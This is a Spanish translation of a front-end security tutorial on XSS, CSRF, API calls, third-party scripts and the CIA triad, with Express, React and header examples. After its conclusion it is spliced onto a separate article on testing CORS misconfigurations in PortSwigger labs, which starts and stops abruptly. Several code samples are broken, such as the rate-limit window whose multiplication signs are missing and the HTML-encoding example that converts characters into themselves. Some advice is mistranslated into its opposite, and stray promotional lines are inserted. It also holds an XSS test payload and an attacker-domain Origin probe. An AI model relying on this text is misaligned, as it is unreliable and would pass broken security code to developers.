En estos días, los ciberataques están incrementando las preocupaciones de las que todos en un equipo de desarrollo deberían ser conscientes. Esto significa que si eres un desarrollador, deberías aprender algunas bases de las habilidades de ciberseguridad.

Después de todo, los atacantes son típicamente desarrolladores en sí mismo, y sus ataques solamente están aumentando en frecuencia, variedad, y complejidad.

No te digo esto para inculcar miedo. Simplemente, creo que todos los desarrolladores deberían aumentar sus habilidades de ciberseguridad, punto. No solamente entendiendo los principios, sino aplicándolos también. Y esto no es solo importante para ti si trabajas con el equipo de DevSecOps. Es importante para todos.

Así que, ¿cuál es el rol crítico que los desarrolladores de Front-end pueden jugar al proteger aplicaciones y productos? Continúa leyendo para averiguarlo.

Tabla de Contenidos

• La Ciberseguridad no es solamente una responsabilidad del Back-End
• Entendiendo el Rol del Desarrollador de Front-End en Seguridad
• Amenazas de Ciberseguridad del Mundo Real afectando al Front-end

• Pasos Prácticos para Mitigar Vulnerabilidades de Terceros
• Principios Básicos de Ciberseguriad para Desarrolladores de Front-End

• Conclusión

La Ciberseguridad no es solamente una responsabilidad del Back-End

La Ciberseguridad ya no es algo que solamente se deben de preocupar los desarrolladores de Back-end.

Aprender estas habilidades pueden beneficiar a cada desarrollador, pero en este artículo, me enfocaré en el desarrollo de Front-end por dos razones.

Primero, el desarrollo de Front-end es usualmente visto como el lado más creativo del desarrollo. No es que los equipos no vean a la ciberseguridad como algo importante aquí, pero no suele ser una prioridad. Esta forma de pensar podría llevar a errores catastróficos que comprometen todo el sistema completo. Especialmente porque las vulnerabilidades de Front-end son comúnmente explotados en estos días.

La otra razón es que el Front-end es donde el cliente interactúa con la aplicación y probablemente tenga su primera interacción real con la marca. Los desarrolladores de Front-end necesitan asegurar que esta experiencia sea fructífera, positiva, amigable, y construya confianza.

Ya hay muchas personas hablando sobre mantener el Back-end seguro, – ya que eso viene con el territorio. Así que, hablemos sobre por qué necesitas mitigar los riesgos en el Front-end, para qué riesgos específicos prepararse, y cómo mejorar tus habilidades de ciberseguridad.

Nota rápida – estas habilidades no solo van a ser útiles y prácticas para agregar a tu caja de herramientas. También te prepararán para nuevas oportunidades para crecer en tu carrera, especialmente ahora que la industria de la ciberseguridad continúa creciendo.

Entendiendo el Rol del Desarrollador de Front-End en Seguridad

Los desarrolladores de Front-end juegan un rol crucial como la primera línea de defensa en contra de los atacantes.

Cada clic de botón, envío de formulario, y llamada a la API necesitan ser fluidos, y el desarrollador Front-end hace esto posible. Enfocarse en el Front-end significa que estos desarrolladores son los guardianes de las interacciones del usuario. Como tal, están haciendo mucho más que solo crear una interfaz de usuario elegante; también tiene que ser seguro y prevenir vulnerabilidades.

Los desarrolladores de Front-end manejan cómo los datos son recolectados, validados y pasados a los sistemas de Back-end, por lo que no hay lugar para errores en ningún punto. De otra manera, usuarios maliciosos podría causar estragos en toda la aplicación.

Por definición, el Front-end es la parte más expuesta de cualquier aplicación, por lo que si hay una vulnerabilidad en el código, puede potencialmente ser explotados por los atacantes. Implementar software de protección de datos comprensivos minimiza los riesgos de seguridad desde el principio.

En contraste, el código de Back-end se oculta a los usuarios y se ejecuta en entornos controlados, a diferencia del código de Front-end, el cual es servido a los navegadores de los usuarios y es accesible a los usuarios y a los atacantes de la misma forma. Por ejemplo, si un desarrollador de Front-end implementa un pobre manejo de entrada de usuario, los sistemas de Back-end podría ser expuestos a inyecciones de SQL o ataques de Cross-Site Scripting (XSS). Abajo, discutimos estas amenazas específicas en más detalle.

Amenazas de Ciberseguridad del Mundo Real afectando al Front-end

Los ciberataques vienen de muchas formas. Si estamos hablando sobre el Front-end, estos pueden variar desde ataques en campos de entrada de usuario a la explotación de librerías de terceros. Las vulnerabilidades más comúnes son:

1. Cross-Site Scripting o (XSS)
2. Falsificación de Peticiones en Sitios Cruzados (CSRF - Cross-Site Request Forgery en inglés)
3. Llamadas a API Inseguras
4. Vulnerabilidades de Script de Terceros

1. Cross-Site Scripting (XSS):

XSS es probablemente la vulnerabilidad más común discutido en el desarrollo Front-end y en la ciberseguridad. Ocurre cuando una aplicación genera scripts maliciosos inyectados por un atacante que se ejecuta en el navegador del usuario. Esto es posible solamente debido a una impropia sanitización de entrada.

Por ejemplo, malos actores podría usar ataques de XSS para inyectar un script en una sección de comentarios. Ya sea debido a una impropia sanitización de entradas o el atacante pasando por alto la validación, así también como otros usuarios ven este comentario, el script puede robar las cookies o redireccionar a los usuarios a sitios de phishing.

XSS es peligroso porque se dirige directamente a los usuarios y puede comprometer sus datos, sin mencionar su confianza en tu aplicación.

Los ataques de XSS se están volviendo más peligrosos y sofisticados con el tiempo. Al dirigirse directamente a los usuarios, los atacantes pueden cosechar datos personales o redireccionar a los usuarios a sitios web maliciosos.

Objeción: XSS es una preocupación del Back-End, no del Front-End

Si quieres ponerte técnico y objetar diciendo que XSS no es verdaderamente una preocupación del Front-end sino del Back-end, veo de dónde vienes. Prevenir XSS puede ser hecho enteramente en el Back-end a través de validación de entradas, sanitización, y pruebas.

Pero este pensamiento pierde el punto de esta discusión, al que yo te quiero llevar. A saber, el Front-end es donde el riesgo se origina, y por lo tanto, si hay lugar para mitigar el riesgo de forma inmediata, en primera línea, hay que hacerlo.

También, si la validación falla en el Back-end, la vulnerabilidad todavía se mantiene ya que el ataque tiene éxito en superar este punto particular de falla. En cambio, ¿por qué no fortalecer tanto el Back-end como el Front-end para una defensa superior?

Pasos Prácticos para Mitigar Ataques de XSS

1. Sanitización de Entradas

El primer paso es implementar un proceso de sanitización de entrada que usa librerías o características incorporadas del framework para eliminar caracteres dañinos antes de que sean procesados o mostrados. Por ejemplo, en JavaScript, librerías como DOMPurify puede ayudar en limpiar el contenido generado por el usuario para quitar scripts maliciosos.

Aquí hay un ejemplo simplificado de entrada no sanitizado vs sanitizado:

// Código Vulnerable
const userInput = document.getElementById('comment').innerHTML = "<script>alert('Hackeado!')</script>";

// Con DOMPurify
const sanitizedInput = DOMPurify.sanitize(userInput);
document.getElementById('comment').innerHTML = sanitizedInput;

2. Codificación

Si tu aplicación permite a los usuarios contribuir contenido generado por ellos mismos, codifícalo. Si los navegadores intenta leerlo, solamente lo verán como texto en vez de código ejecutable.

Por ejemplo, la codificación de HTML puede convertir < y > en < y >.

3. Política de Seguridad de Contenido (CSP - Content Security Policy en inglés)

También puedes configurar Políticas de Seguridad de Contenido (CSPs) para actuar como una red de seguridad. Una Política de Seguridad de Contenido es un mecanismo de defensa basado en el navegador. Al definir reglas en los encabezados HTTP de tu servidor, puedes restringir los tipos de contenido (por ejemplo, JavaScript, CSS, y así sucesivamente) que están permitidos cargar, aunque no podrían detectar todos los ataques o vulnerabilidades XSS.

Esta política asegura que solamente los scripts de tu propio dominio o fuentes confiables sean ejecutados para mitigar el riesgo de XSS.

Al combinar sanitización de entrada, codificación, y CSPs, puedes reducir significativamente el riesgo de ataques XSS. El fortalecer el Front-end así como el Back-end provee la defensa en capas necesaria para proteger los datos del usuario y mantener la confianza en tu aplicación.

2. Falsificación de Peticiones Entre Sitios (CSRF):

Usuarios autenticados quienes confían en un sitio podrían ser engañados potencialmente en realizar acciones que nunca quisieron y podrían inclusive no notarlo. Esto podría conducir a cambiar o eliminar cuentas o transferir fondos. Estos son ataques CSRF, y pueden ser particularmente devastadores para los usuarios de una aplicación.

Para dar un ejemplo de CSRF, digamos que un usuario dejó un sitio de red social sin cerrar la sesión. Ellos visitan un nuevo sitio, el cual termina siendo malicioso, y una formulario oculto envía una solicitud para actualizar automáticamente su biografía del perfil de la red social con enlaces phishing. Siendo que ellos ya estaban autenticados, la plataforma procesa la solicitud maliciosa como si fuera del usuario.

Nuevamente, podrías argumentar que abarcar el problema de CSRF es una cuestión del Back-end, donde puedes usar tokens anti-CSRF para prevenir estos ataques. Es verdad que estos tokens son cruciales, pero descuidar la responsabilidad del Front-end en crear un flujo de trabajo seguro puede dejar a las aplicaciones vulnerables.

Por ejemplo, implementar autenticación de dos factores (2FA) puede agregar una capa adicional de seguridad, asegurando que incluso si un intento de CSRF ocurra, acciones no autorizadas son significativamente más difíciles de ejecutar.

Los ataques de CSRF facilitan a los atacantes robar información personal en línea. De hecho, 1 de 4 personas son propensos a ser víctimas de un crimen en línea, así que protegerse en contra de estos ataques es crucial.

Pasos Prácticos para Mitigar Ataques CSRF

Si los desarrolladores de Front-end quieren crear flujos de trabajo más robustos que prevengan ataques de CSRF, el primer paso es reforzar la intención del usuario. En cualquier momento que hayan acciones de usuario potencialmente sensibles, deberías requerir confirmación explícita de que ellos quieren proceder. Podrías simplemente preguntar, "¿estás seguro de que quieres hacer eso?" Es una forma sencilla pero seguro de hacerles al menos pensar y confirmar su decisión.

Luego está el problema de clickjacking. Este es simplemente el nombre para cuando los malos actores usan elementos ocultos o sobrepuesto (como botones o enlaces) en una página aparentemente legítima para engañar a los usuarios en que hagan clic en algo distinto de lo que esperan. Por ejemplo, un usuario podría pensar que está haciendo clic en un botón inofensivo, pero en realidad, están aprobando una acción sensible como transferir fondos o cambiar las opciones de cuenta.

Para prevenir esto, usa encabezados como X-Frame-Options o Content-Security-Policy para evitar que los atacantes incrusten tu aplicación en etiquetas iframes.

• X-Frame-Options Header: Este encabezado le dice al navegador si tu sition puede ser incrustado en un iframe y por quién.

Ejemplo:

X-Frame-Options: DENY

Esto asegura que tu aplicación no pueda ser incrustado en ningún iframe el cual bloquea efectivamente cualquier intento de clickjacking.

De forma alternativa, puedes especificar fuentes confiables específicas:

X-Frame-Options: ALLOW-FROM https://trusted-domain.com

Esto permite a los iframe que carguen tu aplicación solamente en un dominio confiable.

• Content-Security-Policy (CSP): Ya que el X-Frame-Options es efectivo, CSP provee más flexibilidad. Puedes usar la directiva frame-ancestors para controlar qué dominios están autorizados para incrustar tu aplicación.

Ejemplo:

Content-Security-Policy: frame-ancestors 'self' https://trusted-domain.com;

Esto asegura que solamente tu propio sitio ('self') o explícitamente dominios permitidos pueda mostrar tu aplicación en un iframe.

Tocaré mas sobre esto abajo, pero una clave para crear un programa de seguridad integral es colaborar efectivamente con tus homólogos del Back-end. Ya que probablemente tengan un proceso para tokens anti-CSRF, puedes entender cómo son generados y aseguran que están incluidos de forma apropiada en todas las peticiones relevantes.

Para una mayor seguridad de comunicación con tus equipos se recomienda usar aplicaciones aprobadas por DOD.

3. Llamadas a API Inseguras

La API es lo que permite al Front-end y el Back-end del sistema que se comuniquen. El Front-end es frecuentemente donde las llamadas a la API son iniciadas y donde los datos sensibles son manejados. Si la API no es segura en términos de tokens y credenciales de Front-end, todo el sistema puede terminar comprometido.

La Encriptación es la clave para mantener tus claves de API y tokens seguros de forma que no sean expuestas en el código del lado del cliente o de alguna manera compartidos sobre conexiones sin encriptación, donde actores maliciosos pudieran fácilmente interceptar y abusar. Esto recae en el desarrollador de Front-end porque políticas de CORS mal implementadas o procesos de manejo de errores pueden en realidad conducir a información filtrada. Integrar de forma segura las APIs en un sistema de gestión de comunicación puede mejorar aún más la protección al optimizar las medidas de seguridad para interacciones sensibles.

Llamadas a API inseguras puede ser una mina de oro para los atacantes. Si tokens o credenciales sensibles son expuestos, serán capaces de acceder a cuentas y robar datos personales, probablemente para cometer robo de identidad. Asegurar las APIs trata sobre prevenir que los atacantes encuentren vulnerabilidades.

Afortunadamente, hay unas pocas formas de que puedas hacer tu API más seguras.

Pasos Prácticos para Mitigar ataques a una API

Así como la última sección, puedes prevenir un montón de dolores de cabeza al usar conexiones cifradas y reforzadas con HTTPS. Esto ayuda en mantener a raya a los chicos malos y previene la intercepción durante la transmisión.

Cuando se traba sobre información sensible que rodea a tu API, asegúrate de usar cookies seguras con los argumentos HttpOnly y Secure en vez de localStorage o sessionStorage ya que son accesibles por JavaScript y vulnerables a ataques XSS.

Las cookies seguras son críticos para almacenar información confidencial como IDs de sesión o tokens de autenticación. Al usar los argumentos HttpOnly y Secure, haces que las cookies sean inaccesibles a JavaScript (reduciendo el riesgo de ataques XSS) y asegurar que solamente sean transmitidos sobre HTTPS.

Aquí hay un ejemplo de poner cookies seguras en Express.js:

app.use(require('cookie-parser')());

app.get('/set-cookie', (req, res) => {
  res.cookie('authToken', 'tu-token-seguro', {
    httpOnly: true,  // Evita el acceso a JavaScript del lado del cliente
    secure: true,    // Asegura que las cookies sean enviadas solamente sobre HTTPS
    sameSite: 'strict', // Evita el uso de cookie entre sitios
  });
  res.send('¡Cookie seguro configurado!');
});

Oh, y si tienes alguna información sensible sobre la API, sólo asegúrate de incluirlos en ningún mensajes de error de API. Los mensajes de error pueden ser una mina de oro para los atacantes que buscan explotar tu sistema. Evita exponer detalles sensibles sobre tu API, tales como trazos del stack, estructuras de la Base de Datos, o mecanismos de autenticación, en las respuestas de error.

Mira un poco este ejemplo sobre sanitizar mensajes de error en Express.js:

app.use((err, req, res, next) => {
  console.error(err.stack); // Registra el error completo internamente para depurar
  res.status(500).send({
    error: 'Un error inesperado ocurrió. Por favor intente nuevamente más tarde.',
  }); // Envía un mensaje de error genérico al cliente
});

By sanitizing responses, you reduce the chances of leaking information that could aid an attacker.

4. Vulnerabilidades de Script de Terceros

El desarrollo puede tomar un largo tiempo cuando se hace desde cero, por lo que scripts y librerías de terceros son esenciales para poner en marcha una aplicación y ejecutarla rápidamente. Con scripts de terceros, obtienes funcionalidad pre-construida y puede acortar el tiempo de desarrollo de forma significativa. El único problema es que podría haber vulnerabilidades de las que no seas consciente debido a que el script no es enteramente tuyo.

Extender tu desarrollo para incluir scripts o librerías de terceros sí incrementa la probabilidad de un riesgo potencial, ya que una sola librería comprometida podría introducir código malicioso en todas las aplicaciones que están conectadas a él.

Para algunos negocios como envío directo y comercio electrónico, los cuales frecuentemente se basan en herramientas de terceros para la gestión de inventario, procesamiento de órdenes, y funcionalidades del sitio web, asegurar la seguridad de estos scripts es crucial para mantener la integrar operacional y la confianza del cliente.

Históricamente hablando, al menos un incidente (mira "event-stream" si no has oído de él) involucró un paquete ampliamente usado afectando a miles de proyectos porque no estaba cuidadosamente monitoreado.

Pasos Prácticos para Mitigar Vulnerabilidades de Terceros

Como un desarrollador front-end, hay algunos formas para evitar escenario, y mayormente involucran auditar de forma constante. Si estás considerando usar cualquier librerías de terceros, haz todo lo que puedas para ver si tiene vulnerabilidades.

Hay muchas herramientas para esto, algunos que ya podrías estar usando como Snyk, npm audit, or OWASP Dependency-Check para escanear la librería en busca de problemas. Por ejemplo, si estás considerando en agregar una librería de JavaScript para manejar formularios de entrada de usuario, puedes comenzar ejecutando un auditoría:

npm audit

Esto resaltará cualquier vulnerabilidad en las dependencias de la librería. Si se encuentran vulnerabilidades críticas, o actualiza el paquete (si hay parches disponibles) o considera alternativas.

También puedes simplemente restringir el número de scripts para incluir solamente aquellos que coincidan con el criterio que has designado tales como estar siendo mantenido activamente, teniendo un fuerte registro de seguridad, y que venga de fuentes acreditados. De forma adicional, implementa salvaguardas para controlar su comportamiento. Por ejemplo, usa una Política de Seguridad de Contenido (CSP) para restringir de dónde pueden cargar los scripts. Agrega un encabezado CSP a tu aplicación:

<meta http-equiv="Content-Security-Policy" content="script-src 'self' https://trusted-library.com;">

Esto restringe a los scripts a tu propio dominio y la fuente de terceros confiable.

También puedes echar un ojo a la comunidad y ver qué actualizaciones están por llegar sobre parches de seguridad y deprecaciones para tus librerías existentes. Si tienes que hacer cambios porque encuentras algunos problemas, asegúrate de compartir tus descubrimientos con la comunidad. Esto podría ser a través de documentación escrita, publicaciones de blog, o inclusive grabando vídeos que explican tus descubrimientos y soluciones.

Nuevamente, no estamos diciendo que deberías tirar todos los centavos del presupuesto para trabajar en tus proyectos desde cero. Pero probablemente puedes encontrar el balance correcto entre las librerías útiles y las sospechosas una vez que aprendas a realizar auditorías.

Principios Básicos de Ciberseguriad para Desarrolladores de Front-End

Volvamos a ayudarte, como desarrollador, a entender cómo puedes beneficiarte de la ciberseguridad. Después de todo, el desarrollo de Front-end segura se reduce a entender tres principios claves de ciberseguridad: Confidencialidad, Integridad y Disponibilidad. Usualmente le llamo la Triada CID (CIA en inglés), porque solo usando estos tres principios, puedes construir un marco de trabajo de seguridad comprensiva.  

Confidencialidad

La Confidencialidad trata sobre proteger datos sensibles. Tu objetivo es asegurar que las personas equivocada no pongan sus manos sobre los datos de los que no deberían acceder. Así que, donde entras como un desarrollador de Front-end es crear sistemas cuidadosamente que mantenga los datos seguros ya que se maneja en el lado del cliente hacia y desde el servidor.

Si un usuario comparte datos sensibles con tu aplicación, digamos, en un formulario de generación potencial, ya han mostrado que confían en ti para mantener su información seguro. Esta información incluye contraseñas, claves de API, números de tarjeta de crédito, información de identificación de personal, y otra información personal o financiera. Si confían en tu aplicación, es mejor ser capaces de mantener su información seguro y protegido. Si no lo hace, arriesgas en que su información y posiblemente su identidad sea comprometida.

Convirtiendo la Confidencialidad en una Habilidad

Dominar la habilidad para manejar datos sensibles seguramente es la clave para asegurar la confidencialidad. Aquí está cómo puedes proteger la confidencialidad del usuario:

1. Encripta los Datos en el Tránsito usando HTTPS

Para asegurar que los datos permanezcan confidenciales durante la transmisión, siempre utiliza HTTPS. Éste encripte la comunicacón entre el cliente y el servidor lo que hace más difíciles a los atacantes que intercepten información sensible. Por ejemplo, cuando despliegues tu aplicación, asegúrate que tu servidor web se configure para reforzar HTTPS. Si estás usando Nginx, tu archivo de configuración debería incluir:

server {
    listen 443 ssl;
    ssl_certificate /path/to/cert.pem;
    ssl_certificate_key /path/to/key.pem;
    server_name yourdomain.com;
}

Esto asegura que toda la comunicación entre cliente y servidor se encripte.

2. Aprender a Almacenar Datos Sensibles en Ubicaciones Seguras

Evita almacenar información sensible (como tokens o contraseñas) en mecanismos de navegadores inseguros tales como localStorage o sessionStorage. En cambio, usa cookies seguras con los argumentos HttpOnly y Secure. Por ejemplo, cuando pongas las cookies para la autenticación de usuario, configúralos de esta forma en tu Back-end:

res.cookie('authToken', token, {
    httpOnly: true,
    secure: true,
    sameSite: 'Strict',
});

Esto previene que ataques basado en JavaScript (como XSS) accedan a la cookie a la vez que asegura quese envíe solamente sobre HTTPS.

3. Valida y Sanitiza las Entradas

Cuando recolectes datos sensibles, valida y sanitiza las entradas de usuario para prevenir datos maliciosos de que sean procesados. Si estás construyendo un formulario para recolecar PII, como direcciones de email o números de teléfono, valida la entrada tanto el lado del cliente como del servidor:

Validación del lado del Cliente (React):

const validateEmail = (email) => {
    const regex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
    return regex.test(email);
};

Validación del lado del Servidor (Node.js):

const sanitize = require('sanitize-html');
app.post('/submit', (req, res) => {
    const sanitizedInput = sanitize(req.body.email);
    // Proceso de entrada sanitizada
});

4. Minimiza la Exposición de Datos

Solamente recoge y expón los datos cuando sea absolutamente necesario. Evitar incluir información sensible en los registros, URLs, o mensajes de error de API.

Por ejemplo, cuando depures un problema en producción, usa registros redactados para los datos sensibles:

console.log(`Usuario: ${user.name}, Contraseña: [REDACTADO]`);

Esto previene la exposición accidental de información sensible en tus registros.

Integridad

La Integridad de los datos es más que asegurar que cada pieza de información permanezca precisa, y consistente, y no cambie en el curso de su ciclo de vida. En otras palabras, a medida que los datos viajen a través de la transmisión, procesamiento, o almacenamientos, nunca se dañe, o sea manipulado.

Esto requiere algo de proactividad, porque no estás solamente protegiendo la integridad de la información de los atacantes sino también tus propios sistemas o errores potenciales. Datos alterados pueden romper la funcionalidad o engañar a los usuarios. O los atacantes podrían modificar las entradas de datos para explotar vulnerabilidades, como ya discutí anteriormente.

Convirtiendo la Integridad en una Habilidad

Si tu aplicación acepta entrada de usuario, tales como una dirección email, valídalo con un regex antes de enviarlo al servidor.

Validación del lado del Cliente:

const isValidEmail = (email) => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email);
if (!isValidEmail(userInput)) {
    alert("Dirección de email inválido");
}

Validación del lado del Servidor:

const { body, validationResult } = require('express-validator');
app.post('/register', [
    body('email').isEmail().withMessage('Email inválido'),
    body('password').isLength({ min: 8 }).withMessage('La contraseña debe ser al menos 8 caracteres de largo'),
], (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) {
        return res.status(400).json({ errors: errors.array() });
    }
    // Procesa entrada válida
});

Validación del lado del servidor actúa como una segunda capa de defensa. Usando un framework como Express en Node.js.

Acciones de usuario importantes, tales como modificar los detalles de la cuenta o eliminar datos, requiere confirmación explícita del usuario para prevenir cambios maliciosos o initencionales. Puedes usar un diálogo de confirmación para operaciones sensibles como eliminar una cuenta de usuario:

const deleteAccount = () => {
    const confirmed = window.confirm("¿Estás seguro que quieres eliminar tu cuenta?");
    if (confirmed) {
        // Procede con la eliminación de la cuenta
        fetch('/delete-account', { method: 'DELETE' });
    }
};

Sanitiza los datos para saducir cualquier caracter dañino o scripts antes de que se procesen. Usa librerías como DOMPurify para limpiar la entrada de usuario en una aplicación de React:

import DOMPurify from 'dompurify';
const sanitizedInput = DOMPurify.sanitize(userInput);

Esto asegura que contenido potencialmente malicioso, tales como <script>alerta('XSS')</script>, sea neutralizado antes de renderizarse.

Para prevenir la manipulación del DOM, usa funciones de codificación para reducir el riesgo de ejecutar scripts malos u otras entradas de usuario. En React, usa el argumento dangerouslySetInnerHTML cuidadosamente y solamente con contenido sanado de forma apropiada.

const safeContent = DOMPurify.sanitize(unsafeContent);
return <div dangerouslySetInnerHTML={{ __html: safeContent }} />;

La Codificación previene que el contenido generado por el usuario sea ejecutado como código.

Y no te olvides de mantener un ojo cerrado sobre cualquier script de tercero regularmente para asegurar que no hayan áreas de preocupación. Como ya he discutido antes, herramientas como Snyk o npm audit son usados para verificar vulnerabilidades en las dependencias. Abarca las vulnerabilidades señaladas con protintud al actualizar o reemplazar paquetes problemáticos. De forma adicional, asegura la implementación de soluciones de copias de seguridad robustos para proveer almacenamiento inmutable y encriptación de extremo a extremo para reducir el riesgo de pérdida de datos y de acceso no autorizado de forma significativa. Y no te olvides de mantener un ojo cerrado sobre cualquier script de terceros de forma regular para asegurarte que no hayan áreas de preocupación.

Disponibilidad

La Disponibilidad trata todo sobre acceso. ¿Tu aplicación de Front-end permanece operacional de manera confiable y accesible a tus usuarios? Si es así, incluso ante amenazas potenciales, entonces estás haciendo bien.

El éxito aquí es sobre diseñar soluciones que mantienen a la aplicación en ejecución, especialmente en tiempos de tráfico de usuario pesado, fallas de servidor, lo que quieras. No puedes tener una aplicación exitosa que se rompe todo el tiempo o posee una amenaza potencial debido al tiempo de inactividad.

Convirtiendo la Disponibilidad en una Habilidad

Como desarrollador de Front-end quien quiere enfocarse en la disponibilidad, tendrás que aprender a cómo:

1. Distribuir el Tráfico entre Servidores

El balance de carga esparce las peticiones de usuarios a través de múltiples servidores para prevenir sobrecargar un sólo servidor y mantener la operación fluida durante el pico de tráfico. Si estás desplegando un Front-end en AWS, usa Balance de Carga Elástica (ELB en inglés) para distribuir el tráfico:

• Configura múltiples instancias de EC2 para hospedar tu aplicación.
• Configura un ELB para enrutar las peticiones de usuarios de forma uniforme a través de estas instancias.
• ELB también detecta instancias no sanas y re-enrute el tráfico a las sanas automáticamente.

2. Implementa Guardar en caché los Mecanismos

Guardar en caché frecuentemente recursos accesidos de forma local el cual reduce la carga de servidor y acelera las peticiones de usuario. Puedes usar la caché del navegador para almacenar archivos como imágenes, hojas de estilo, y scripts.

Caché del lado del Cliente:

En tus encabezados de respuesto de HTTP, pon directivas de control de caché:

Cache-Control: public, max-age=31536000

Esto le dice a los navegadores que guarden en caché los recursos por un año para reducir las peticiones a tu servidor.

Caché del lado del Servidor:

Usa herramientas como Redis o Varnish Cache para almacenar datos dinámicos. Si estás usando un servidor de Node.js con Redis:

const redis = require('redis');
const client = redis.createClient();

app.get('/data', async (req, res) => {
    const cachedData = await client.get('key');
    if (cachedData) {
        return res.json(JSON.parse(cachedData));
    }
    const data = await fetchDataFromDatabase();
    client.setex('key', 3600, JSON.stringify(data)); // Caché por 1 hora
    res.json(data);
});

3. Implementa Reglas de Limitación de Tasa

Al implementar reglas de limitación de tasa para limitar el número de solicitudes de la misma IP en un fragmento de tiempo dado, estás previniendo el abuso y asegurar la disponibilidad para todos los usuarios. Usa una librería como express-rate-limit en tu aplicación de Node.js:

const rateLimit = require('express-rate-limit');
const limiter = rateLimit({
    windowMs: 15  60  1000, // 15 minutos
    max: 100, // Limita a cada IP 100 solicitudes por ventana
    message: "Demasiadas solicitudes de esta IP, por favor intente nuevamente más tarde.",
});
app.use(limiter);

Esto asegura que ningún usuario pueda abrumar a tus servidores, manteniendo la aplicación disponible para todos.

Conclusión

Recuerda, entender y aplicar estas habilidades importantes de ciberseguridad no es solo para el Back-end. Mientras que el desarrollo de Front-end se enfoca en las estéticas e interactividad, también es una línea crítica de defensa donde puedes mitigar amenazas antes de que se vuelvan problemas mayores.

La clave es saber cómo usar estas habilidades de forma que tu trabajo de Front-end sea tan seguro como tu trabajo de Back-end. He cubierto diferentes tipos de ataques y las habilidades necesarias para reducir los riesgos, pero solamente tendrás éxito si aprendes a aplicarlos por ti mismo.

Con algo de práctica y un entendimiento básico de cómo funciona la ciberseguridad, puedes crear aplicaciones amigables y seguras. Además, construir tus habilidades de ciberseguridad puede ayudarte en abrir nuevas oportunidades en el futuro, así que el mejor momento para abrazarlos es ahora.

Comienza a plicar estas ideas hoy, o siéntete libre de explorar recursos adicionales. No tengas miedo de invertir desarrollo personal de unirte a comunidades de ciberseguridad.

Pronto averiguarás cuán importante es entender ciberseguridad como un desarrollador moderno, y puedes contribuir a construir un futuro más resiliente y más seguro.

La política SOP ayuda en proteger a los usuarios de scripts maliciosos que podrían acceder a datos sensibles o realizar acciones no autorizados en su nombre.

Por ejemplo, si business.com intenta realizar una solicitud HTTP a metrics.com, el navegador, por defecto, bloqueará la solicitud porque viene de un distinto dominio.

Por mucho que el SOP suene como una política de protección apropiada, no escala bien con las tecnologías de hoy en día que dependen uno del otro para operar. Por ejemplo, presenta desafíos a las APIs y microservicios que tienen casos de uso legítimos para acceder y compartir información entre dominios.

Por casos como este, hubo una necesidad para un nuevo mecanismo de seguridad que permitiría interacciones entre dominios. Es conocido como Intercambio de Recursos entre Orígenes (CORS en inglés).

Este artículo cubrirá lo básico de cómo funciona CORS e identificar vulnerabilidades comunes que pueden ocurrir cuando no implementas CORS correctamente. Aprenderemos cómo probar y explotar las configuraciones erróneas de esa forma al final de esta guía, tendrás un mejor entendimiento de cómo probar y validar para CORS durante una prueba de penetración (pentest).

Usaré los laboratorios (entornos) CORS de Port Swigger para demostrar la prueba y pasos de explotación.

Tabla de Contenido

• ¿Qué es la Política de Origen entre Sitios (CORS)?
• Impacto de las Configuraciones erróneas de CORS
• Cómo identificar CORS
• Casos explotables de CORS
• Caso inexplotable
• Mitigaciones
• Recursos

¿Qué es la Política de Origen entre Sitios (CORS)?

CORS es una característica de seguridad creada para relajar selectivamente las restricciones de SOP y permitir acceso controlado a recursos de distintos dominios. Las reglas de CORS permiten a los dominios especificar qué dominios pueden solicitar información de ellos al agregar cabeceras de HTTP específicas en la respuesta.

Hay varias cabeceras de HTTP relacionadas a CORS, pero estamos interesados en los dos que se relacionan a las vulnerabilidades vistas comúnmente – Access-Control-Allow-Origin y Access-Control-Allow-Credentials.

Access-Control-Allow-Origin: Esta cabecera especifica que los dominios permitidos lean el contenido de la respuesta. El valor puede ser un caracter comodín (*), el cual indica que todos los dominios están permitidos, o lista de dominios separados por coma.

#Todos los dominios están permitidos
Access-Control-Allow-Origin: *   


#Lista de dominios separados por coma
Access-Control-Allow-Origin: example.com, metrics.com

Access-Control-Allow-Credentials: Esta cabecera determina si el dominio permite pasar credenciales — tales como cookies o cabeceras de autorización en las solicitudes entre origen.

El valor de la cabecera es True o False. Si la cabecera es puesto a "true", el dominio permite enviar credenciales. Si se pone a "false," o no es incluido en la respuesta, entonces no se le permite.

#Permite pasar credenciales en las solicitudes
Access-Control-Allow-Credentials: true

#No permite pasarlos en las solicitudes
Access-Control-Allow-Credentials: false

Impacto de las Configuraciones erróneas de CORS

Las Configuraciones erróneas de CORS pueden tener un impacto significativo en la seguridad de aplicaciones web. Abajo están las implicaciones principales:

• Robo de Datos: Los atacantes pueden usar las vulnerabilidades de CORS para robar datos sensibles de aplicaciones como claves API, claves SSH, Información Personal Identificable (PII), o credenciales de usuarios.
• Secuencias de comandos entre sitios (XSS): Los atacantes pueden usar las vulnerabilidades de CORS para realizar ataques XSS al inyectar scripts maliciosos en páginas web para robar tokens de sesión o realizar acciones no autorizados en el nombre del usuario.
• Ejecución de Código Remoto en algunos casos (caso de StackStorm)

Cómo identificar CORS

Cuando se prueba una aplicación para CORS, verificamos si cualquiera de las respuestas de la aplicación contienen las cabeceras de CORS. Podemos usar la funcionalidad de búsqueda en Burp Suite para buscar las cabeceras rápidamente.

En el ejemplo de abajo, busqué la cabecera Access-Control-Allow-Credentials y obtuve tres (3) respuestas. Una vez que las cabeceras son identificadas, podemos seleccionar las solicitudes y enviarlos al Repetidor para una análisis más detallado.

Figuras 1 & 2 muestran la funcionalidad de búsqueda en Burp Suite para buscar las cabeceras de CORS.

Para identificar los problemas de CORS, podemos modificar la cabecera Origin en las solicitudes con múltiples valores y ver qué cabeceras de respuesta obtenemos de la aplicación. Hay cuatros (4) formas conocidas para hacer esto, los cuales veremos ahora.

1. Orígines Reflejados

Poner la cabecera Origin en la solicitud a un dominio arbitrario, tales como https://attackersdomain.com, y verificar la cabecera Access-Control-Allow-Origin en la respuesta. Si refleja el dominio exacto que supliste en la solicitud, significa que el dominio no filtra para ningún origen.

El riesgo de esta configuración errónea es alta si el dominio permite que las credenciales se pasan en las solicitudes. Podemos validar que al verificar si la cabecera Access-Control-Allow-Credentials también está incluida en la respuesta y es puesta a true.

Sin embargo, el riesgo es bajo si el pasar credenciales no está permitido, ya que el navegador no procesará las respuestas de solicitudes no autenticados.

📌 Para explotar orígenes reflejados, verificar la sección de explotación — Caso #1.

